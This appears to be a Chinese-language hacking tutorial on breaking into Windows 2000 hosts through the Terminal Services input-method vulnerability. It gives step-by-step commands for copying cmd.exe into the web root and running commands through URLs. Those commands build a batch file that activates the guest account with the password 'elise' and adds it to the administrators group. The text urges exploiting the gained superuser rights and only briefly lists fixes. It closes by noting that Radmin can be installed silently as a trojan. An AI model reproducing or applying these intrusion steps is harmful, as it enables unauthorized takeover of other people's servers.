个人主机入侵网络攻击的步骤

　　1、用终端客户端程序进行连接；

　　2、按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰， 就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；

　　3、在\"选项\"菜单上点右键--->跳转到URL\"，输入：c:\\winnt\\system32\\cmd.exe.（ 如果不能确定NT系统目录，则输入：c:\\ 或d:\\ ……进行查找确定）；

　　4、选择\"保存到磁盘\" 选择目录：c:\\inetpub\\s\\，因实际上是对方服务器上文件自身 的复制操作，所以这个过程很快就会完成；

　　5、打开IE，输入：http://ip/s/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就 完成了第一步；

　　6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat

　　7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat

　　8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add

　　guest>>go.bat

　　9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

　　net user guest /active:yes

　　net user guest elise

　　net localgroup administrators /add guest

　　10、在\"选项\"菜单上点右键--->跳转到URL\"，输入：c:\\inetpub\\s\\go.bat --->在磁 盘当前位置执行；

　　11、OK，.这样我们就激活了服务器的geust帐户，密码为：elise，超级用户！

　　注意事项：

　　当你用终端客户端程序登陆到他的服务器时，你的所有操作不会在他的机器上反应出来，但 如果他正打开了终端服务管理器，你就惨了了：（这时他能看到你所打开的进程id、程序映 象，你的ip及机器名，并能发消息给你！

　　1.在IE下，所拥有的只是iusr_machine权限，因而，你不要设想去做越权的事情，如启动 telnet、木马等；

　　2.url的跳转下，你将拥有超级用户的权限，好好利用吧 :-）

　　这个漏洞在WIN2000 SP1中已经修改，因此，实际网络中存在此漏洞的机器几乎没有，但是 ，据说紫光2.3版本、超级五笔的输入法中又发现此漏洞。

　　解决方法

　　1.打补丁；

　　2.删掉相关输入法，用标准就可以；

　　3.服务中关掉：Terminal Services，服务名称：TermService，对应程序名：system32 \\termsrv.exe；

　　如果对方已经修改了输入法漏洞，那么只能通过猜解目标管理员口令的方法来尝试远程登陆 。

　　5632/4899：PCANYWERE和RADMIN

　　这是两种远程控制软件，使用方式与远程终端访问类似，都支持图形化界面对远程计算机进 行管理，设计的初衷是为了让管理员能够更方便的管理设备，但这些软件，特别是RADMIN， 可以设置其在安装时，不出现任何提示，这种方式使RADMIN更多的被做为一种木马使用。攻 击者会注意扫描这些端口，因为一旦破解了相应口令就可以象操作本地计算机一样控制目标 。

最新评论